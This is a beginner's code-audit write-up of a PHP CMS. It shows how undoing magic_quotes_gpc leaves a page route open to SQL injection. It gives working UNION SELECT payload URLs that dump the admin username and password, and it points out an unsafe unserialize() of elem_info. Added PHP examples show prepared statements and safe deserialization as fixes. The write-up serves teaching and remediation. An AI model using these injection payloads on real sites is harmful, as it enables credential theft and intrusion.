Recently I have been studying code auditing, so I went to chinaz to find a personal CMS that is fairly popular. This article is aimed at people who, like me, are just getting started.
I went through the source code in batches, and the whole system is riddled with injection.
Yes, the values are wrapped in single quotes, so they would still need to be bypassed, and with magic_quotes_gpc enabled that would be painful. However, this remarkable CMS actually strips the magic_quotes escaping automatically...
    // Remove Magic_Quotes
    if (get_magic_quotes_gpc()) // Maybe would be removed in php6
    {
        // Recursively undo the backslashes that magic_quotes_gpc added to request data
        function stripslashes_deep($value)
        {
            $value = is_array($value)
                ? array_map('stripslashes_deep', $value)
                : (isset($value) ? stripslashes($value) : null);
            return $value;
        }
        $_POST   = stripslashes_deep($_POST);
        $_GET    = stripslashes_deep($_GET);
        $_COOKIE = stripslashes_deep($_COOKIE);
    }
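The following is an added example, not code from the CMS being audited: it shows why undoing magic_quotes_gpc is not the real problem and why escaping is not the real fix. A value is run through addslashes() to stand in for what magic_quotes_gpc would have produced, then through stripslashes() exactly as the CMS's stripslashes_deep() does; the same lookup is then written once by string concatenation (the CMS's pattern) and once as a prepared statement. The in-memory SQLite table, its columns and its rows are constructed for the demonstration, and the pdo_sqlite extension is assumed to be available.

```php
<?php
// Added example (not the CMS's own code). Constructed `elem` table in SQLite.

// What magic_quotes_gpc would have handed the script, then what stripslashes_deep() does to it.
function simulate_magic_quotes_then_strip(string $raw): string
{
    $escaped = addslashes($raw);     // stand-in for magic_quotes_gpc output
    return stripslashes($escaped);   // the CMS undoes it immediately
}

// Vulnerable pattern: the request value is spliced into the SQL text.
function lookup_by_concat(PDO $db, string $name): array
{
    $sql = "select * from `elem` where 1 and lower(elem_name) = lower('$name')";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: a bound parameter never becomes part of the SQL grammar,
// so a quote in the input is only a character in the compared string.
function lookup_by_prepared(PDO $db, string $name): array
{
    $stmt = $db->prepare("select * from `elem` where 1 and lower(elem_name) = lower(:name)");
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("create table `elem` (id integer, elem_name text, title text)");
$db->exec("insert into `elem` values (18, 'about', 'About us')");

// The single-quote probe from the write-up: the backslash is stripped again,
// so the quote reaches the query intact.
$input = simulate_magic_quotes_then_strip("a'");
echo "after stripslashes_deep the input is: $input\n";

try {
    lookup_by_concat($db, $input);
} catch (PDOException $e) {
    // The unbalanced quote breaks the statement, which is the symptom
    // the write-up used to confirm the injection point.
    echo "concat query failed: " . $e->getMessage() . "\n";
}

// The prepared statement neither errors on the probe nor matches anything,
// and still matches a legitimate name case-insensitively.
echo "prepared rows for probe: " . count(lookup_by_prepared($db, $input)) . "\n";
echo "prepared rows for 'About': " . count(lookup_by_prepared($db, 'About')) . "\n";
```

The point to take away is that addslashes-style escaping (which magic_quotes_gpc provided and this CMS removes) was only ever a partial mitigation; binding parameters removes the whole class of problem regardless of what the request layer does to quotes.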
Let's start with injection at the front end.
http://127.0.0.1/coder/alpaca/index.php/page/18/
The corresponding SQL statement is
select count(*) as a from `elem` where 1 and rel_id='18'
When we submit
http://127.0.0.1/coder/alpaca/index.php/page/a'
the SQL statement becomes
select * from `elem` where 1 and lower(elem_name) = lower('a'')
This is a classic union query. I was still thinking about how to bypass gpc and didn't expect the CMS to strip it for me automatically.
Submit directly
http://127.0.0.1/coder/alpaca/index.php/page/a') AND 1 =2 UNION SELECT 1 ,2,3, 4,5,6, 7, 8, 9,username,PASSWORD FROM user %23
and everything comes out.
Look at the source code in app\v\elem\page.php. In fact, much of the source code is well written.
    if (!is_array($page)) show_404();
    $pid = $page['id'];
    if ($action == 'add') {
        $this->add($pid);
        return;
    }
    // elem_info comes straight from the database row and is unserialized as-is
    $info = unserialize($page['elem_info']);
    $meta = array(
        'page_title'       => isset($info['page_title']) && $info['page_title'] != '' ? $info['page_title'] : $page['title'],
        'meta_keywords'    => isset($info['meta_keywords']) && $info['meta_keywords'] != '' ? $info['meta_keywords'] : $page['title'],
        'meta_description' => isset($info['meta_description']) && $info['meta_description'] != '' ? $info['meta_description'] : $page['title']
    );
    $param = array_merge($page, $info, $meta);
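As an added example (not the CMS's own code), here is how page.php could treat elem_info as untrusted data instead of handing it straight to unserialize(). Once the column is reachable through the injection above, whatever it deserializes to is attacker-controlled, so the helper below only accepts a plain array with known string keys and uses the allowed_classes option (PHP 7+) so that no serialized object is ever instantiated. The names ELEM_INFO_KEYS, decode_elem_info() and build_meta() are mine, and the sample rows and payloads are constructed.

```php
<?php
// Added example (not the CMS's own code). Names and sample data are constructed.

// The only keys page.php actually reads from elem_info.
const ELEM_INFO_KEYS = ['page_title', 'meta_keywords', 'meta_description'];

// Decode elem_info defensively: accept an array of known string keys, nothing else.
function decode_elem_info(?string $blob): array
{
    if ($blob === null || $blob === '') {
        return [];
    }
    // allowed_classes=false turns any serialized object into __PHP_Incomplete_Class
    // instead of constructing it, so no __wakeup/__destruct code can run.
    // The @ silences the notice that malformed input produces.
    $info = @unserialize($blob, ['allowed_classes' => false]);
    if (!is_array($info)) {
        return [];   // false (malformed) or an object: treat as "no settings"
    }
    $clean = [];
    foreach (ELEM_INFO_KEYS as $key) {
        if (isset($info[$key]) && is_string($info[$key]) && $info[$key] !== '') {
            $clean[$key] = $info[$key];
        }
    }
    return $clean;
}

// Same defaulting logic as page.php, but built only from the validated array.
function build_meta(array $page, array $info): array
{
    $meta = [];
    foreach (ELEM_INFO_KEYS as $key) {
        $meta[$key] = $info[$key] ?? $page['title'];
    }
    return $meta;
}

// Constructed sample page row and three elem_info values.
$page = ['id' => 18, 'title' => 'About us'];
$good = serialize(['page_title' => 'About', 'meta_keywords' => 'cms,demo']);
$bad  = 'O:8:"stdClass":1:{s:3:"foo";s:3:"bar";}';   // an object, not a settings array
$junk = 'not-serialized-at-all';                      // malformed input

// Legitimate settings are used; missing keys fall back to the page title.
print_r(build_meta($page, decode_elem_info($good)));
// A serialized object is rejected outright: every key falls back to the title.
print_r(build_meta($page, decode_elem_info($bad)));
// Malformed data is handled the same way, without a warning.
print_r(build_meta($page, decode_elem_info($junk)));
```

Validating the structure after decoding also removes the array_merge($page, $info, $meta) surprise in the original, where arbitrary keys from elem_info could overwrite columns of the page row. The injection itself is still the bug to fix first; this only limits what a tampered elem_info can do.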
There is a $page['elem_info'] that goes straight into unserialize(), so I place a valid elem_info value (hex-encoded) in position 6.
The resulting exp:
http://127.0.0.1/coder/alpaca/index.php/page/a') AND 1 =2 UNION SELECT 18,PASSWORD ,'page',10,1,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, 7, "1334937721","1334937721", 10,11 FROM user %23/
The administrator password is successfully disclosed.